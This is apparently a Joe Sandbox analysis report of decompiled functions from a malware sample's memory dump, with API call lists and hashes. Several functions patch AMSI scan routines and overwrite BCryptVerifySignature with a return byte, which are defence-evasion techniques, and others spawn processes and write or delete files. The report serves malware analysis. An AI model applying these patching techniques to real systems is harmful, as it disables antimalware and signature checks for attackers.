                    											_v20 = FindFirstFileA( &_v599,  &_v338);
                    											if(_v20 != 0xffffffff) {
                    												FindClose(_v20);
                    												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
                    													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
                    													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
                    													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
                    													_t108 = _t106;
                    													continue;
                    												}
                    											}
                    										}
                    										goto L17;
                    									}
                    									lstrcpynA(_v8,  &_v599, _v12);
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
                    					if(_t103 == 0) {
                    						goto L4;
                    					} else {
                    						_push(0x105);
                    						_push( &_v599);
                    						_push(_v8);
                    						if( *_t103() == 0) {
                    							goto L4;
                    						} else {
                    							lstrcpynA(_v8,  &_v599, _v12);
                    						}
                    					}
                    				}
                    				L17:
                    				return _v16;
                    			}

                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32.dll,03266BF8,03260000,03289790), ref: 032658E9
                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 03265900
                    • lstrcpynA.KERNEL32(?,?,?), ref: 03265930
                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 03265994
                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659CA
                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659DD
                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659EF
                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000,03289790), ref: 032659FB
                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8,03260000), ref: 03265A2F
                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,03266BF8), ref: 03265A3B
                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 03265A5D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                    • String ID: GetLongPathNameA$\$kernel32.dll
                    • API String ID: 3245196872-1565342463
                    • Opcode ID: 1a5f19c2572a8e162bb2100219df5ab0d5038bc0ecd6f33ad1ac33a9349a403d
                    • Instruction ID: 0c1c0c0c6feafb23720ae3b28c7b7988dbdbcca12baa439854ba94dd0fbc6686
                    • Opcode Fuzzy Hash: 1a5f19c2572a8e162bb2100219df5ab0d5038bc0ecd6f33ad1ac33a9349a403d
                    • Instruction Fuzzy Hash: 41416072D10219AFDB10DEE8CC88ADEB7FCAF09250F2845A5A545D7241E6B0EFD08B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0327CFB0(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                    				char _v5;
                    				char _v8;
                    				struct _STARTUPINFOW _v76;
                    				struct _PROCESS_INFORMATION _v92;
                    				char _v348;
                    				char _v352;
                    				char _v356;
                    				char _v360;
                    				char _v364;
                    				char _v368;
                    				char _v372;
                    				intOrPtr _v376;
                    				char _v380;
                    				char _v384;
                    				char _v388;
                    				char _v392;
                    				char _v396;
                    				char _v400;
                    				char _v404;
                    				char _v408;
                    				char _v412;
                    				char _v416;
                    				char _v420;
                    				char _v424;
                    				intOrPtr _v428;
                    				char _v432;
                    				char _v436;
                    				char _v440;
                    				char _v444;
                    				char _v448;
                    				char _v452;
                    				char _v456;
                    				char _v460;
                    				char _v464;
                    				char _v468;
                    				WCHAR* _t138;
                    				void* _t211;
                    				intOrPtr _t213;
                    				void* _t223;
                    				void* _t226;
                    				void* _t229;
                    				void* _t237;
                    				void* _t240;
                    				void* _t250;
                    				void* _t253;
                    				void* _t256;
                    				void* _t259;
                    				intOrPtr _t260;
                    				void* _t266;
                    				void* _t270;
                    				intOrPtr _t272;
                    				intOrPtr _t273;
                    
                    				_t272 = _t273;
                    				_t213 = 0x39;
                    				do {
                    					_push(0);
                    					_push(0);
                    					_t213 = _t213 - 1;
                    					_t274 = _t213;
                    				} while (_t213 != 0);
                    				_push(_t213);
                    				_t1 =  &_v8;
                    				_t214 =  *_t1;
                    				 *_t1 = _t213;
                    				_t270 = __edx;
                    				_t211 = __eax;
                    				_push(_t272);
                    				_push(0x327d3c0);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t273;
                    				E03264698( &_v352, "AmsiOpenSession");
                    				_push(_v352);
                    				E03264698( &_v356, "Amsi");
                    				_pop(_t223);
                    				E03277C04(_v356,  *_t1, _t223, _t274);
                    				E03264698( &_v360, "AmsiUacScan");
                    				_push(_v360);
                    				E03264698( &_v364, "Amsi");
                    				_pop(_t226);
                    				E03277C04(_v364, _t214, _t226, _t274);
                    				E03264698( &_v368, "AmsiScanString");
                    				_push(_v368);
                    				E03264698( &_v372, "Amsi");
                    				_pop(_t229);
                    				E03277C04(_v372, _t214, _t229, _t274);
                    				_push(0x327d410);
                    				E03264704( &_v380, _t211, _t274);
                    				_push(_v380);
                    				_push(0x327d41c);
                    				E03264704( &_v384, _t270, _t274);
                    				_push(_v384);
                    				E03264824();
                    				E0326473C( &_v348, 0xff, _v376);
                    				E03263098( &_v76, 0x44);
                    				_v76.cb = 0x44;
                    				_v76.dwFlags = 1;
                    				_v76.wShowWindow =  *_t1;
                    				E03264698( &_v388, "AmsiScanString");
                    				_push(_v388);
                    				E03264698( &_v392, "Amsi");
                    				_pop(_t237);
                    				E03277C04(_v392, 0, _t237, _t274);
                    				E03264698( &_v396, "AmsiScanBuffer");
                    				_push(_v396);
                    				E03264698( &_v400, "Amsi");
                    				_pop(_t240);
                    				E03277C04(_v400, 0, _t240, _t274);
                    				E03264704( &_v412, _t211, _t274);
                    				E03267F10(_v412,  &_v408);
                    				E03264D38( &_v404, E03264964(_v408));
                    				_t138 = E03264DB4(_v404);
                    				E03264704( &_v420,  &_v348, _t274);
                    				E03264D38( &_v416, E03264964(_v420));
                    				CreateProcessAsUserW( *0x3392794, 0, E03264DB4(_v416), 0, 0, 0, 0x30, 0, _t138,  &_v76,  &_v92);
                    				_push(0x327d438);
                    				_push( *0x33928a8);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v424, E03264964(_v428));
                    				_push(_v424);
                    				_t217 =  *0x33928a8;
                    				E032647B0( &_v436,  *0x33928a8, 0x327d438);
                    				E03264698( &_v432, E03264964(_v436));
                    				_pop(_t250);
                    				E03277C04(_v432,  *0x33928a8, _t250, _t274);
                    				NtCreateProcess(_v92.hProcess, 0x1f0fff, 0x33928d8, 0, 1, 0, 0, 0);
                    				E03264698( &_v440, "AmsiUacScan");
                    				_push(_v440);
                    				E03264698( &_v444, "Amsi");
                    				_pop(_t253);
                    				E03277C04(_v444, _t217, _t253, _t274);
                    				E03264698( &_v448, "AmsiUacInitialize");
                    				_push(_v448);
                    				E03264698( &_v452, "Amsi");
                    				_pop(_t256);
                    				E03277C04(_v452, _t217, _t256, _t274);
                    				E03264698( &_v456, "AmsiScanBuffer");
                    				_push(_v456);
                    				E03264698( &_v460, "Amsi");
                    				_pop(_t259);
                    				E03277C04(_v460, _t217, _t259, _t274);
                    				_t275 = _v5;
                    				if(_v5 != 0) {
                    					E03264698( &_v464, "AmsiOpenSession");
                    					_push(_v464);
                    					E03264698( &_v468, "Amsi");
                    					_pop(_t266);
                    					E03277C04(_v468, _t217, _t266, _t275);
                    					WaitForSingleObject(_v92.hProcess, 0xffffffff);
                    					CloseHandle(_v92);
                    					CloseHandle(_v92.hThread);
                    				}
                    				_pop(_t260);
                    				 *[fs:eax] = _t260;
                    				_push(0x327d3c7);
                    				E032644C4( &_v468, 0xd);
                    				E03264C24( &_v416);
                    				E032644C4( &_v412, 2);
                    				E03264C24( &_v404);
                    				return E032644C4( &_v400, 0xd);
                    			}

                    APIs
                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,?,?,?,?,?), ref: 0327D1E2
                      • Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
                      • Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
                      • Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
                      • Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82
                    • NtCreateProcess.N(?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000,00000000,00000000,00000000,00000000), ref: 0327D278
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000,00000000,00000000), ref: 0327D355
                    • CloseHandle.KERNEL32(?,?,000000FF,?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000,00000000), ref: 0327D35E
                    • CloseHandle.KERNEL32(?,?,?,000000FF,?,001F0FFF,033928D8,00000000,00000001,00000000,00000000,00000000,ScanBuffer,0327D438,?,00000000), ref: 0327D367
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Handle$CloseCreateLibraryProcess$AddressFreeLoadModuleObjectProcSingleUserWait
                    • String ID: Amsi$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$D$ScanBuffer
                    • API String ID: 1036135174-2335947617
                    • Opcode ID: a45d5ce8e887e7ae3d9214b30f4fc3560b09f1ff5ec584f0f088cd87e4b4de5f
                    • Instruction ID: d4dbaa9fa4a45279f60d2200d50f051b92cea35a0dcc1d596af8c1d0bf227f4b
                    • Opcode Fuzzy Hash: a45d5ce8e887e7ae3d9214b30f4fc3560b09f1ff5ec584f0f088cd87e4b4de5f
                    • Instruction Fuzzy Hash: 9CA1FF39A2131D9FDB11FB65CC80BDEB3B9AF49300F5045D2A548AB254DBB4AEC58F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E03265B9C() {
                    				void* _t32;
                    				CHAR* _t56;
                    				CHAR* _t57;
                    				struct HINSTANCE__* _t64;
                    				void* _t66;
                    
                    				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
                    				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
                    				_t64 = 0;
                    				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
                    					L14:
                    					return _t64;
                    				} else {
                    					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
                    					L5:
                    					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
                    						_t56 = _t56 - 1;
                    						goto L5;
                    					}
                    					_t32 = _t66 - 0x11d;
                    					if(_t56 != _t32) {
                    						_t57 =  &(_t56[1]);
                    						if( *(_t66 - 0x12) != 0) {
                    							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
                    							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                    						}
                    						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
                    							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                    							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                    							if(_t64 == 0) {
                    								 *((char*)(_t66 - 0xb)) = 0;
                    								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
                    								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
                    							}
                    						}
                    					}
                    					goto L14;
                    				}
                    			}

                    APIs
                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03265BAC
                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03265BB9
                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03265BBF
                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03265BEA
                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C31
                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C41
                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C69
                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C79
                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03265C9F
                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03265CAF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                    • API String ID: 1599918012-2375825460
                    • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                    • Instruction ID: 56ee514624d08ef8abe8aa5c71c9fa44d5bfed631f14b09c616007099b5c3c5b
                    • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                    • Instruction Fuzzy Hash: C831B671E5066D2AFB25D6B4CC86FDFB7AC4F05380F0401E19605E61C5EAB4AED88B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E03277B14(void* __eax, CHAR* __ecx) {
                    				long _v20;
                    				void _v24;
                    				intOrPtr _v36;
                    				void* _t7;
                    				long _t10;
                    				WCHAR* _t13;
                    				CHAR* _t17;
                    				struct HINSTANCE__* _t18;
                    				void* _t19;
                    
                    				_t17 = __ecx;
                    				_t19 = __eax;
                    				_v24 = 0xc3;
                    				_t10 = 0;
                    				_t18 = LoadLibraryW(_t13);
                    				if(_t18 > 0) {
                    					_t7 = GetProcAddress(_t18, _t17);
                    					if(_t7 != 0) {
                    						NtWriteVirtualMemory(_t19, _t7,  &_v24, 1,  &_v20);
                    						if(_v36 > 0) {
                    							_t10 = 1;
                    						}
                    					}
                    					FreeLibrary(_t18);
                    				}
                    				return _t10;
                    			}

                    APIs
                    • LoadLibraryW.KERNEL32(bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8,ScanString,0329E35C,03279F4C), ref: 03277B26
                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 03277B33
                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize), ref: 03277B4A
                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,03279F4C,Initialize,0329E35C,03279F4C,UacScan,0329E35C,03279F4C,UacInitialize,0329E35C,03279F4C,00000000,0329E3D8), ref: 03277B59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                    • String ID: BCryptVerifySignature$bcrypt
                    • API String ID: 1002360270-4067648912
                    • Opcode ID: 923a967787751e240ebbd6fd4fa39d26f7f32154ba0ff206837c286df80b68bd
                    • Instruction ID: dfa442d5a284e335e3144c39c151ab76218b4a5a96bf103c4ea1c46fd8ba5242
                    • Opcode Fuzzy Hash: 923a967787751e240ebbd6fd4fa39d26f7f32154ba0ff206837c286df80b68bd
                    • Instruction Fuzzy Hash: 5FF0E9351163557DD220E1685D44E7F675CDFC2760F08463DB9548B180DAB1888583F2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 33%
                    			E0327CB04(char __eax, void* __ebx, char __edx, void* __esi) {
                    				char _v8;
                    				char _v12;
                    				void* _v16;
                    				char _v24;
                    				void* _v32;
                    				void* _v56;
                    				intOrPtr _t52;
                    				char _t54;
                    				void* _t58;
                    
                    				_v12 = __edx;
                    				_v8 = __eax;
                    				E03264954(_v8);
                    				E03264EE4( &_v12);
                    				_push(_t58);
                    				_push(0x327cbd6);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t58 + 0xffffffcc;
                    				_push(0);
                    				_push(0);
                    				_push( &_v24);
                    				_push(E03264DB4(_v12));
                    				L0327CA44();
                    				E0327CA4C( &_v56, 0x40,  &_v24, 0, 0, 0);
                    				NtCreateFile( &_v16, 0x100002,  &_v56,  &_v32, 0, 0, 1, 2, 0x20, 0, 0);
                    				_t54 = _v8;
                    				if(_t54 != 0) {
                    					_t54 =  *((intOrPtr*)(_t54 - 4));
                    				}
                    				_push(0);
                    				_push(0);
                    				_push(_t54);
                    				_push(E032649BC( &_v8));
                    				_push( &_v32);
                    				_push(0);
                    				_push(0);
                    				_push(0);
                    				_push(_v16);
                    				L03277D30();
                    				NtClose(_v16);
                    				_pop(_t52);
                    				 *[fs:eax] = _t52;
                    				_push(0x327cbdd);
                    				E03264C24( &_v12);
                    				return E032644A0( &_v8);
                    			}

                    APIs
                      • Part of subcall function 03264EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03264EF2
                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0327CBD6), ref: 0327CB43
                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0327CB7D
                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0327CBAA
                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0327CBB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                    • String ID:
                    • API String ID: 3764614163-0
                    • Opcode ID: 6a0a75f87ae26e85b6d10f29ebb649dd1b315acb635aacff8cb854880e3c1c47
                    • Instruction ID: 6d590e5791f8ac703b358c19928e5d120a6c691f097a73c899fb424a44d4c916
                    • Opcode Fuzzy Hash: 6a0a75f87ae26e85b6d10f29ebb649dd1b315acb635aacff8cb854880e3c1c47
                    • Instruction Fuzzy Hash: 8E21CD75A90318BAEB10EAA5CC46F9EB7BCEF04B10F614461B650FB1C0D7B46E8486A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0327CA74(short __eax, void* __ebx) {
                    				short _v8;
                    				void* _v16;
                    				void* _v40;
                    				intOrPtr _t33;
                    				void* _t36;
                    
                    				_v8 = __eax;
                    				E03264EE4( &_v8);
                    				_push(_t36);
                    				_push(0x327caee);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t36 + 0xffffffdc;
                    				RtlInitUnicodeString( &_v16,  &_v8);
                    				_push(0);
                    				_push(0);
                    				_push( &_v16);
                    				_push(E03264DB4(_v8));
                    				L0327CA44();
                    				E0327CA4C( &_v40, 0x40,  &_v16, 0, 0, 0);
                    				NtDeleteFile( &_v40);
                    				_pop(_t33);
                    				 *[fs:eax] = _t33;
                    				_push(0x327caf5);
                    				return E03264C24( &_v8);
                    			}









                    APIs
                      • Part of subcall function 03264EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03264EF2
                    • RtlInitUnicodeString.N(?,?,00000000,0327CAEE), ref: 0327CA9C
                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0327CAEE), ref: 0327CAB2
                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0327CAEE), ref: 0327CAD1
                      • Part of subcall function 03264C24: SysFreeString.OLEAUT32(0327D70C), ref: 03264C32
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                    • String ID:
                    • API String ID: 1694942484-0
                    • Opcode ID: 577531467761520fc4789875c27a27278972a3fbf59ed85629ad69086934d57e
                    • Instruction ID: f91f47a0d4b390cf080bdf8d14546f63355fa4e7a01bb62f46cde9810f9b808e
                    • Opcode Fuzzy Hash: 577531467761520fc4789875c27a27278972a3fbf59ed85629ad69086934d57e
                    • Instruction Fuzzy Hash: A101FF7991030CBEDB01EFB4CD52FCEB7FCFB48604F514462A604E6580EBB4AB4496A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E03267FB6(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                    				long _v8;
                    				long _v12;
                    				long _v16;
                    				long _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				CHAR* _t25;
                    				int _t26;
                    				intOrPtr _t31;
                    				intOrPtr _t34;
                    				intOrPtr* _t39;
                    				intOrPtr* _t40;
                    				intOrPtr _t48;
                    				intOrPtr _t50;
                    
                    				_t25 = _a4;
                    				if(_t25 == 0) {
                    					_t25 = 0;
                    				}
                    				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                    				_v28 = _v8 * _v12;
                    				_v24 = 0;
                    				_t48 = _v24;
                    				_t31 = E0326539C(_v28, _t48, _v16, 0);
                    				_t39 = _a8;
                    				 *_t39 = _t31;
                    				 *((intOrPtr*)(_t39 + 4)) = _t48;
                    				_t50 = _v24;
                    				_t34 = E0326539C(_v28, _t50, _v20, 0);
                    				_t40 = _a12;
                    				 *_t40 = _t34;
                    				 *((intOrPtr*)(_t40 + 4)) = _t50;
                    				return _t26;
                    			}


















                    APIs
                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 03267FD9
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: DiskFreeSpace
                    • String ID:
                    • API String ID: 1705453755-0
                    • Opcode ID: 7cd56386601e5bded6be262e9dd390575e027af0f6e0fee89c279f759f26a8f2
                    • Instruction ID: 90d20bf377b63e28cba18e238db25e51e2d315fb6e798bd95abafa3dd286775b
                    • Opcode Fuzzy Hash: 7cd56386601e5bded6be262e9dd390575e027af0f6e0fee89c279f759f26a8f2
                    • Instruction Fuzzy Hash: CE1112B5E00209AFDB00CF99C880DAFF7F9EFC8600B14C569A404EB250E6719E418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326A7A8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                    				char _v260;
                    				int _t5;
                    				intOrPtr _t10;
                    				void* _t18;
                    
                    				_t18 = __ecx;
                    				_t10 = _a4;
                    				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
                    				_t19 = _t5;
                    				if(_t5 <= 0) {
                    					return E032644F4(_t10, _t18);
                    				}
                    				return E03264590(_t10, _t5 - 1,  &_v260, _t19);
                    			}








                    APIs
                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0326A7C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: c5002ac666217e3fc8018e8c2be572dce496c21dd53c59d62ff8594365e5cde6
                    • Instruction ID: 92ad3a893dd82377cf0eecde264dc8dad23327356be33b082fb5c524d823e099
                    • Opcode Fuzzy Hash: c5002ac666217e3fc8018e8c2be572dce496c21dd53c59d62ff8594365e5cde6
                    • Instruction Fuzzy Hash: 26E0927572021417D311E6695C819EA726CAF68250F00426AAD45DF340EDF09DC082E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0326B770() {
                    				char _v128;
                    				intOrPtr _v132;
                    				signed int _v136;
                    				intOrPtr _v140;
                    				intOrPtr _v144;
                    				int _t7;
                    				struct _OSVERSIONINFOA* _t18;
                    
                    				_t18->dwOSVersionInfoSize = 0x94;
                    				_t7 = GetVersionExA(_t18);
                    				if(_t7 != 0) {
                    					 *0x32897c0 = _v132;
                    					 *0x32897c4 = _v144;
                    					 *0x32897c8 = _v140;
                    					if( *0x32897c0 != 1) {
                    						 *0x32897cc = _v136;
                    					} else {
                    						 *0x32897cc = _v136 & 0x0000ffff;
                    					}
